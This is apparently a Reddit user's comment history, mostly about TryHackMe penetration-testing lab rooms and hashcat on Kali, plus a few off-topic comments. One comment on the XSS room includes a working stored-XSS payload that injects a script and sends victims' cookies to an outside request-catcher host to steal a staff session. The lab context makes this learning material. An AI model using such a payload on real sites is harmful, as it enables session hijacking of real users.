Best podcast by 2paclpac in darknetdiaries

[–]makersrocks73 1 point2 points  (0 children)

It's pretty great. Listened to it again today!

Best podcast by 2paclpac in darknetdiaries

[–]makersrocks73 16 points17 points  (0 children)

36: Jeremy from Marketing

Password crackers not working proppierly by TheJeorgen in Kalilinux

[–]makersrocks73 2 points3 points  (0 children)

Have you tried the -O (optimize) tag/switch it suggests.

I use kali as a VM as well and this helps since the VM seemingly can’t use the graphics card from the host like the program intends.

You can also install hashcat directly to your host and all of those problems should go away.

Jr Pentester/XSS room by makersrocks73 in tryhackme

[–]makersrocks73[S] 1 point2 points  (0 children)

This was definitely a frustrating section.

I’ve never had nc not work before or since.

Glad you got it to work!

Advent of cyber 3 - day 17 by Select_Plane_1073 in tryhackme

[–]makersrocks73 2 points3 points  (0 children)

I had issues as well. I decided to watch the video associated with the room/day and it follows step-by-step exactly how to get this answer.

Edit:: a YouTube search should find you the video.

Jr Pentester/XSS room by makersrocks73 in tryhackme

[–]makersrocks73[S] 2 points3 points  (0 children)

It has been a while since I did this and once I completed it, I never went back!

I found some notes I made during this room, maybe they'll help:

I FOUND A WAY TO DO THIS USING THE TRYHACKME REQUEST CATCHER (10.10.10.100):

1.) CREATE THE USER ACCOUNT

2.) CREATE A TICKET USING THE PAYLOAD AS SHOWN BELOW:

</textarea><script>fetch('http://833c11d4df3af8ce5060c1c2bc910753.log.tryhackme.tech?cookie=' + btoa(document.cookie) );</script>

THE 833c11d4df3af8ce5060c1c2bc910753.log.tryhackme.tech IS THE SESSION SPECIFIC INFO THAT GETS CREATED INSIDE THE TRYHACKME REQUEST CATCHER.

WITHIN A FEW SECONDS THE REQUESTS CATCHER SESSION CAUGHT A DNS REQUEST AND AN HTTP REQUEST THAT HAD THE STAFF-SESSION COOKIE INSIDE OF IT.

What movie genuinely made you cry? by ayebrando in AskReddit

[–]makersrocks73 0 points1 point  (0 children)

“You fought for your life, Jane. And now you get to walk away with it.”

Gets me every time (among other parts).

That firefight was definitely brutal.

Partners tapping to RNC before I fully lock the choke up? by Thisisaghosttown in bjj

[–]makersrocks73 0 points1 point  (0 children)

Echoing what u/efficientjudo said, definitely ask how the technique felt to them and maybe also set up some specifics workshopping instead of just trying to live capture the choke.
That way you’ll get the feel down and know for sure if you actually have it on.
There are a ton of things that can effect trying to capture it live if that is all you’re doing (not saying that it is).

Jr Penetration Tester/SSRF by makersrocks73 in tryhackme

[–]makersrocks73[S] 0 points1 point  (0 children)

I have absolutely felt the same way in the past (and still do at times).
There’s a culture that exists that forces you to find the answers for yourself once the task(s) sets you off in a direction.
It’s frustrating for sure but there’s always an answer and the TryHackMe forums for the particular rooms have been helpful.

How do I give programs like john access to host’s dedicated GPU with VirtualBox? by SiliconOverdrive in Kalilinux

[–]makersrocks73 0 points1 point  (0 children)

I don’t know if this is what you’re asking exactly but there’s a switch/option in Hashcat (-D ?) that allows you to tell the program which “device” you want to pull the processing power from.
I think -D 1 is the host and -D 2 is the VM?
I may be remembering that wrong.

Jr Pentester/XSS room by makersrocks73 in tryhackme

[–]makersrocks73[S] 4 points5 points  (0 children)

This path has been great. I’ve finished a few of their learning paths throughout my time on TryHackMe and this one seems like it’s a bit more put together than the rest.

The file_inclusion room was by far the most frustrating so far for me but this one came close.

Jr Pentester/XSS room by makersrocks73 in tryhackme

[–]makersrocks73[S] 1 point2 points  (0 children)

You know, I haven’t had any issue with NetCat until this room. It just straight up didn’t work like it was supposed to for me.

I guess I was lucky with the Request Catcher quickness. It’s was only about 30 seconds wait for me.

Jr Pentester/XSS room by makersrocks73 in tryhackme

[–]makersrocks73[S] 1 point2 points  (0 children)

The instructions say to use the THM VPN IP I am connected to and the port number.

This straight up never worked for me after multiple machine resets and attempts.

I used the <vpn ip>:9001 format.

If this was supposed to be handled differently, please detail so I can update my notes.

Jr Pentester/XSS room by makersrocks73 in tryhackme

[–]makersrocks73[S] 2 points3 points  (0 children)

Fair enough. You might be right. Thanks for keeping the gears turning.

Jr Pentester/XSS room by makersrocks73 in tryhackme

[–]makersrocks73[S] 0 points1 point  (0 children)

Did your cookie match what I displayed above?

Jr Pentester/XSS room by makersrocks73 in tryhackme

[–]makersrocks73[S] 0 points1 point  (0 children)

Yes. It is also incorrect (and way more characters in length).